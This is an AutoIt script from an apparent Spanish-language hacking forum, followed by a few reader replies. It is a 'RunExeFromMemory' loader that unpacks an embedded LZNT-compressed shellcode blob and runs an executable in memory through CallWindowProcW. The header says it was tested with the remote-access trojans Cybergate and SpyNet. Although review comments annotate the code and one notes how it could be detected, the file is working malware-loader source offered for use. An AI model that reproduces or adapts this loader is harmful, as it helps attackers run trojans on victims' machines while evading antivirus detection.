
#NoTrayIcon
#;===============================================================================================
#; AutoIt
#; RunExeFromMemory With Compressed ShellCode ( LZNT )
#; Author : M3
#; Mail : [email protected]
#; Release: 03/04/2013
#; Thanks to : TranceXX , Yashed , Pink
#; Reference : http://msdn.microsoft.com/en-us/library/windows/hardware/ff552191(v=vs.85).aspx
#; Tested On : Win7 x86 with Cybergate | SpyNet | Eicar M3
#; Usage : sInject(BinaryBuffer)
#;===============================================================================================


Func sInject($sBinaryBuffer)
; Loader entry point (see the "Usage" line in the file header): $sBinaryBuffer is the
; executable image to be run from memory. The function unpacks the hex blob below with
; ntdll!RtlDecompressBuffer, copies the result into a heap-backed DllStruct and then
; transfers control to it through user32!CallWindowProcW (sCWPW), passing a pointer to
; $sBinaryBuffer. Nothing is returned to the caller and there is no error path: every
; Windows API result is discarded inside sRtlDecompress / sCWPW.
;
; NOTE(review): from a detection standpoint the observable sequence is
; RtlDecompressBuffer followed by CallWindowProcW whose "previous WndProc" argument
; points into heap memory rather than at a registered window procedure, inside a
; compiled AutoIt host.

; Hex text of the compressed shellcode. The file header says it is LZNT-compressed
; (the '2' passed below as the format is COMPRESSION_FORMAT_LZNT1). This is a string
; literal carrying a "0x" prefix, not an AutoIt Binary value.
$sShellCode = '0xB9B600305835353842454300383143343030464402460000353335363537003634384230353330290300384200784305143030' & _
'03006C000C3430313838390034354643433634351045373437020E38353001020E393431333343305F0242009A014E0182002433031635C4303700' & _
'3F353544004B000BD8433839000B042930002301170237006334453835463600373235433436333344443200453832300021440246009344414331' & _
'45330030323033434238428037393043303337011900413146334135444500373735334238413528463033020F38000F3338004134463037334134' & _
'40444539373532801C340838323487293033444229812836368075398002334368313033815F31802F815F30A04642374339803D31823D48313842' & _
'809633378086380180284634454230343440323445373541828B424246838F43303635818F4388313734820332344482034833364682033436830B' & _
'3592378313363682AF4337841B8838343882133936318203A8413645820342841B4384179244841745348313463082CBD44143834341840F41006E' & _
'C10F244146C3214230C321423149C3134232C3214233C315424234C31542353436C10D42A8363639C20137C40738C407243934C2254241C3294242' & _
'5236C2394243C40744C325421645C325004D41C111393837DDC24B394083C203C43739C40F001B11C233394437C23339453529C2213946C32141C4' & _
'57413191C311413234C25541330052A1C0A941343533C1154180B929C2013636C30337C363413895C41139C34141C41F4142C329243838C31B3839' & _
'C30938419C3732C111C09EC26D3843C34B243844C33D3845C345384649C33B3930C3033931C4013289C3193933C321393434C27D48393537C27939' & _
'36C11D3863408341E74646354047400336774303C11E4003374303412440033877C406C023400339C4064015400341B74303C1E8400342A301A408' & _
'43A30167E1116003A2814646A112A00145276403A308830146372227383025E4003123483832233C383339233E3834231CA00823253637C9224638' & _
'37231B3634C309E1527D802B35A3016108A001E51C621936EDE41C35A301E41C36E0242005E41CFD631936E41CA408E41C21322005E51CFBA308E4' & _
'1C3460196003E51C6046A001ED431146216CA01730C301E144A0016631A301230C37326403621137B633A401220C37E41BA31D356403B1A1503835' & _
'356403A30835641F6D230C35641FA31D35653C220C35EF653C202AA0086A3C35651FE0646003DB651F621135641FA31D35653CA21D5E35651FE076' & _
'E006431846631136FB641FE31436641F2154A024651F220CB636E41BA31D346518E214346518EDA248346518222F34E53763036518F16086383534' & _
'651863036418E32276346518E222346418A340842B46DFA42B6518E322E537A216356418A116F360D9647E4542A11FE001007C617C544544637645' & _
'647A4562AA38AC3533E41AA32A336A33336A33DA336A3333E41A632C33E41AA315B633E41A237533EA1A442C462375FE34E51AE328E51A63256533' & _
'630304077FE175A02AC4237149D000B427731B3275740A34B06738F071C320F30632DB750A721432F517721432740A7403DB3424734933750AB220' & _
'33740A931AF633740A133A33750A9302740A5143B7B016740A530B33F425308944700A6D540B35D18990783510073035342B3288320130128B45B2' & _
'00453001707D313338344435410030463835453530311BF18E507E351202008038423581C00438443034303251041A445190355000700335303476' & _
'35F291B00343808AB20350084444344652104242340494430036303431383030343042383346301F508236382044343542469F0A4333A991014143' & _
'9F0143E00A30350A117006303346B2173530366241D09B464433F10E202A37F43835350834809B7509552A9F05F13107383531742BF001580CD305' & _
'DB110630003474001207383F083008CBD10BB07C30710045411418600B99906B35469018B00642341114EF30A5409E901899074614045076321A06' & _
'46701097033641343036F770146315711A44F118D005330DD3007F5F055305305BB423D302B905109D38DF110B210D7805001ED1003030AD5701BB' & _
'FF05120A38130271A1806D3654AB3C4334E06F50AB11A656253035A646500C7219424490A545D0ABA03844313439700043F0ADBD38274430B1802D' & _
'7028C02935B1019C303131B2C0B111033131320141F21435323334303020308E4331015B155030383433D1A848424243F0213038332A30B7A00A51' & _
'2FB11C367436DF11433029FF21103303F101D0055440322791B1361D2531334451B23232D03638353E42B4063106D66FDF1D3F0635317B3B06C019' & _
'34F564FF0330085D09351646403D90174540144332'


; Refuse to run under the interpreter; only the compiled build is supported (the
; header says it was tested on Win7 x86). The MsgBox auto-closes after 2 seconds.
If Not @Compiled Then

MsgBox(0,'Crash','Compile Code To Test' ,2)
Exit

Endif

; Compression format handed to RtlDecompressBuffer as a ushort: 2 == COMPRESSION_FORMAT_LZNT1.
$FormatDecompress = '2'

; Length of the hex *string* in characters ("0x" included), i.e. roughly twice the
; byte count of the compressed blob. It is reused below as a byte count for three of
; the buffers, so those buffers are oversized rather than exact.
$sLenBuffer = StringLen($sShellCode)

; 0x7A120 == 500000 bytes: fixed capacity reserved for $sBinaryBuffer (element 4).
; NOTE(review): nothing compares this against BinaryLen($sBinaryBuffer); presumably an
; oversized payload is silently truncated by DllStructSetData - confirm.
$sAllocateBufferBinary = 0x7A120

; One contiguous struct of four 1-byte ("Boolean") arrays:
;   element 1: compressed blob (source for RtlDecompressBuffer)
;   element 2: decompression destination
;   element 3: copy of the decompressed shellcode that is actually executed
;   element 4: the payload image handed to the shellcode
$sStructure = DllStructCreate ('Boolean[' & $sLenBuffer & ']' & ';Boolean[' & $sLenBuffer & ']' & _
';Boolean[' & $sLenBuffer & ']' & ';Boolean[' & $sAllocateBufferBinary & ']' )

; Store the hex text into element 1.
; NOTE(review): a *string* is written into a byte array here; presumably AutoIt converts
; the "0x..." text to raw bytes on the way in - confirm, because otherwise the ASCII
; characters of the literal are what RtlDecompressBuffer would see.
DllStructSetData($sStructure , 1 , $sShellCode)

; Size of the WHOLE struct (all four elements), not of element 2 alone.
; NOTE(review): this is what RtlDecompressBuffer is told the destination holds, while the
; destination pointer is element 2, so the advertised output window runs past the end of
; the struct by the size of element 1. It only stays harmless while the real decompressed
; size is small; a larger blob would overrun the heap block.
$UncompressedBufferSize = DllStructGetSize($sStructure)

; Source pointer (element 1).
$CompressedBuffer = DllStructGetPtr($sStructure , 1)

; Destination pointer (element 2).
$PointerUncompressedBuffer = DllStructGetPtr($sStructure , 2)

; Passed as sRtlDecompress's fifth argument, which by position is RtlDecompressBuffer's
; CompressedBufferSize - again the full struct size, not the size of the blob.
$sFinalSizeBuffer = $UncompressedBufferSize

; The NTSTATUS is discarded inside sRtlDecompress: a failed or partial decompression is
; not detected, and execution continues with whatever element 2 holds.
sRtlDecompress($FormatDecompress , $PointerUncompressedBuffer, $UncompressedBufferSize, $CompressedBuffer , $sFinalSizeBuffer)

; 0x8C == 140. The number of bytes read back from element 2 becomes (hex string length
; - 140); presumably the author's measured decompressed size for this particular blob,
; so the constant is tied to the literal above - confirm before changing either.
$sLenBuffer = $sLenBuffer - 0x8C

; Overlay a byte array on element 2 and read the decompressed bytes back as Binary.
$sStructurePointer = DllStructCreate('Boolean[' & $sLenBuffer & ']' , $PointerUncompressedBuffer)

$sStructureDecompressed = DllStructGetData($sStructurePointer, 1)

; Binary -> string round trip before the copy into element 3.
; NOTE(review): BinaryToString with its default (ANSI) flag is presumably byte-per-char
; here, but the conversion is unnecessary and any lossy mapping would corrupt the code.
$sDecompressed = BinaryToString($sStructureDecompressed)

; Element 3: the shellcode that will be executed.
DllStructSetData($sStructure, 3, $sDecompressed)

; Element 4: the payload image the shellcode receives as its first argument.
DllStructSetData($sStructure, 4, $sBinaryBuffer)

$sShellCodePtr = DllStructGetPtr($sStructure , 3)

$sBinaryDataPtr = DllStructGetPtr($sStructure , 4)

; Transfer control: CallWindowProcW treats $sShellCodePtr as a window procedure and
; invokes it with $sBinaryDataPtr in the hWnd slot (the other three arguments are 0).
; Note that Call() receives sCWPW's *return value* rather than a function name, so the
; work happens while the argument is evaluated and Call() itself does nothing useful.
; NOTE(review): the struct lives in AutoIt's heap and no VirtualProtect / RWX allocation
; is done first; whether that memory is executable depends on the DEP policy of the
; host process - the header only claims Win7 x86.
Call (sCWPW ($sShellCodePtr, $sBinaryDataPtr , 0 , 0 , 0 ))

EndFunc





Func sRtlDecompress ($CompressType , $sUncompressedBuffer , $sUncompressedBufferSize , $sCompressedBuffer , $FinalUncompressedSize )
; Thin wrapper around ntdll!RtlDecompressBuffer (MSDN link in the file header).
; DllCall passes its six arguments positionally, and the API's parameter order is
; (CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer,
; CompressedBufferSize, FinalUncompressedSize*). The resulting mapping is:
;   $CompressType            -> CompressionFormat (ushort; caller passes '2' == LZNT1)
;   $sUncompressedBuffer     -> UncompressedBuffer (destination)
;   $sUncompressedBufferSize -> UncompressedBufferSize
;   $sCompressedBuffer       -> CompressedBuffer (source)
;   $FinalUncompressedSize   -> CompressedBufferSize (despite the parameter's name)
;   trailing 'ulong*', 0     -> FinalUncompressedSize out-pointer; AutoIt supplies a
;                               temporary ulong whose value would be in $Ret[6], never read.
; Pointers are declared as 'long' (32-bit), which is only correct for an x86 process;
; in an x64 process the pointer values would be truncated.
; The NTSTATUS in $Ret[0] is neither checked nor returned and there is no Return
; statement, so the caller cannot distinguish success from a documented failure such
; as STATUS_BAD_COMPRESSION_BUFFER.

Local $Ret = DllCall('Ntdll', 'int', 'RtlDecompressBuffer' , 'ushort', $CompressType , 'long', $sUncompressedBuffer , 'long', _
$sUncompressedBufferSize ,'long', $sCompressedBuffer, 'long', $FinalUncompressedSize , 'ulong*' , 0)

EndFunc




Func sCWPW($pPrevWndProc, $hWnd, $iMsg, $wParam, $lParam)
; Wrapper around user32!CallWindowProcW. The API invokes the address in $pPrevWndProc as
; a window procedure, i.e. WndProc($hWnd, $iMsg, $wParam, $lParam). sInject uses this as
; an indirect call into shellcode: $pPrevWndProc is the shellcode pointer and $hWnd the
; payload pointer, so no real window is involved.
; The LRESULT in $Ret[0] is discarded, @error from DllCall is not checked, and there is
; no Return statement, so the caller receives nothing back.

Local $Ret = DllCall('User32', 'lresult', 'CallWindowProcW', 'ptr', $pPrevWndProc, 'hwnd', $hWnd, 'uint', $iMsg, 'wparam', $wParam, 'lparam', $lParam)

EndFunc
x4r0r escribió: GRANDE

Muchas gracias bro, espero que le haya servido a más de uno...

PD: mirando bien el post, se me olvidó mencionar al autor del shellcode sin compresión: es de DeadlyVermilion.

Si podéis, editad el post para añadirlo en los agradecimientos.

¿Cuál es el blog de ese parce? No lo veo en la red, o seguro que no busco bien. Thanks.


